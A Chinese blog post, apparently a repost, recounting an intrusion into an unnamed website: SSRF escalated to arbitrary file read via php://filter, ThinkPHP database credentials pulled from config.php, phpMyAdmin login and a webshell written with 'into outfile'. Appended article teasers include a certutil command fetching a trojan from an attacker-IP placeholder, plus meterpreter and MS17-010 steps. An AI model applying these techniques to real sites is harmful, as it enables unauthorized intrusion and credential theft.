<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次滲透某XX站

    VSole2022-07-19 08:07:20

    0x01 前言

    團隊A師傅發來個站,問我有沒有得搞

    正好在搞其他的站,卡住了,開干換個思路。

    0x02 信息收集

    開burp抓了下包,目標設置了url重寫,開了報錯,我們隨意輸入一個控制器就直接報錯。

    獲取到web絕對路徑。抓包發現這樣的請求

    隨手試了一下burpsuite的dnslog,發現請求過去并回顯了,猜測后端使用file_get_contens來獲取。

    一個可回顯ssrf,有什么用呢?打內網?

    嘗試file協議,嘗試讀取文件,發現可以讀。

    但發現返回的內容不完整,猜測有截斷,用php://filter協議base64編碼一下繞過讀取。

    解碼

    有一個任意文件讀取有什么用呢?在這之前,其實是有用nmap掃了一下其他端口

    開了挺多端口的,一個個測了一下發現999端口開著phpmyadmin。

    結合任意文件讀取,那么只要我們讀取出mysql的賬號密碼即可進入phpmyadmin,之后的getshell方法就很多了。

    thinkphp的目錄結構根據官方文檔一般都長這樣。

    而數據庫文件一般是放在common/conf下面的。簡單猜了會,嘗試讀取index控制器。

    之前的報錯其實已經放出了index控制器在那個模塊下面了,就是默認的home模塊。

    讀取

    沒有返回,猜測是application目錄改名了,結合之前的審計經驗,一般會改為app。

    再讀取,成功。

    接下來就是猜數據庫文件存放的位置,一般會存放在common模塊下面的config.php或者db.php,嘗試了一下config.php,命中。

    Base64解碼得出源文件。

    拿到賬號密碼,直奔phpmyadmin。輸入賬號密碼,回車,登陸成功。

    后面拿shell就給A師傅去弄了。

    0x03 URL Rewrite的一些疑惑

    題外話:因為之前幫朋友搞了一些站也是這樣的,有文件上傳直接拿shell,但是沒有辦法訪問,訪問提示:

    有拿到源碼,.htaccess里面有對url重寫,比如長這樣的。

    之前上傳沒法訪問一直以為是重寫的問題。

     

    但其實也可能不是,有可能是馬兒被殺了緣故,當文件不存在的時候才會提示這樣。

    在本地測試,拉了個thinkphp 3.2.3的項目,htaccess一樣配置。

    在根目錄下寫入個test.php,內容為phpinfo。可以直接訪問。

    刪掉test.php,報錯

    換到二級目錄下繼續測試:

    不存在文件的時候同樣提示:

    后面深入研究了一下那份源碼發現也不是馬兒被殺了的原因,應該由于它的分割符問題。不是傳統的/,而是點號,傳統的文件路徑訪問與路由沖突了,最終也就沒辦法訪問到uploads目錄下的shell。

    沒想出對于這種路由有啥辦法可以解決的,如果有知道的師傅歡迎評論交流。

    更新:那個有問題的站也拿下了,原因確實是沒有文件導致的,至于為什么沒有寫入成功又是另外一回事了。

    更新2:感謝love17師傅的評論,關于htaccess的理解之前確實不對,刪掉了,不誤人子弟。

    0x04 拿shell

    由于上面的疑惑,生成了我錯誤的認知,導致我以為拿shell會比較麻煩,我的思路是phpmyadmin 日志方式導出一個符合thinkphp路由的shell到相應的控制器下,以繞過路由的檢測。

    但A師傅說直接into outfile到images目錄就可以了,那就是mysql版本不高也沒有secure_file_priv的問題,直接導出shell了。

    我:emmmmm

    0x05 總結

    對于rewrite語法,路由不熟悉導致了后續一系列問題,錯誤的認知還把自己帶坑里面去了。多開腦子容易秀逗。

    路由shell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0x01 前言在上一篇文章中深入淺出內存馬(一),我介紹了基于Tomcat的Filter內存馬,不光是Fil
    記一次滲透某XX站
    2022-07-19 08:07:20
    嘗試file協議,嘗試讀取文件,發現可以讀。結合任意文件讀取,那么只要我們讀取出mysql的賬號密碼即可進入phpmyadmin,之后的getshell方法就很多了。
    Webshell檢測方法
    2022-01-04 10:33:05
    Webshell作為一種web后門,通常由攻擊者通過常見的Web網站漏洞,如sql注入、文件包含和上傳等,上傳到服務器,從而為攻擊者提供與服務器端進行交互的能力。
    主要記錄拿到Shell后再反彈MSF Shell、Mimikatz抓取密碼以及登錄域控等內網部分。前面漏洞環境搭建及打點等不作記錄,可查看參考文章。攻擊機利用Python開啟HTTP服務$ python -m SimpleHTTPServer 8080. 靶機CMD下載木馬文件$ certutil.exe -urlcache -split -f http://<攻擊者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻擊者IP>:<攻擊機監聽端口>. 并且需要遷移到權限為NT AUTHORITY\SYSTEM的進程,因為進程遷移后meterpreter的權限是遷移進程的權限。查看靶機位數&進程meterpreter > sysinfo # 查看位數。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010掃一下MS17-010meterpreter > background # 后臺掛起Session
    0x01 突破邊界拿下shell周末在家閑著沒事突然就想搞事情了,然后使用Google hack語法輸入批量搜索可能存在上傳點的網站,試了好幾個最后找到一個可利用的上傳點。反彈shell&提權Linux下需要把shell反彈出來以方便我們操作,但是目標主機上既沒有nc也沒有python,查詢相關資料后嘗試了一下利用bash彈shell。在exploit-db中搜索此版本的相關漏洞,經過多次嘗試,發現了下面這個exp來提升權限。一鍵開啟遠程桌面,建立隱藏賬戶,成功連入遠程桌面。
    在紅隊HW中通過前期的打點獲得shell后通常下一步就是對內網進行橫向,獲得shell進想要行橫向的前提是我們必須有代理可以訪問內網中的資產,這時候我們就需要通過拿到shell的那臺機器權限,在此臺機上傳代理工具進行配置搭建內網代理,目的達到內網出網的效果,使我們能夠進行下一步的內網橫向滲透。在hw中經常用到的代理工具有很多,根據不同之需和個人不同的使用習慣選擇不同工具進行使用,本文主要對NPS這
    訪問FastAdmin站點,眼前一亮,祖師爺賞飯吃啊,基本是默認的FastAdmin Demo頁面,開啟了注冊。雖然FastAdmin的漏洞沒利用成功,但是根據DEBUG頁面拿到了數據庫的連接信息。FastAdmin后臺提供了插件管理的功能,可以通過安裝文件管理插件進行Getshell。這里有個小插曲,翻看目標站點源碼發現也是FastAdmin,但是通過先前找的忘記密碼方法添加上去,提示賬號密碼錯誤。另外由于各個站點之間沒有隔離,旁站的shell和目標站點的shell沒有差別,無需繼續,至此滲透結束。
    一次簡單的滲透測試記錄
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类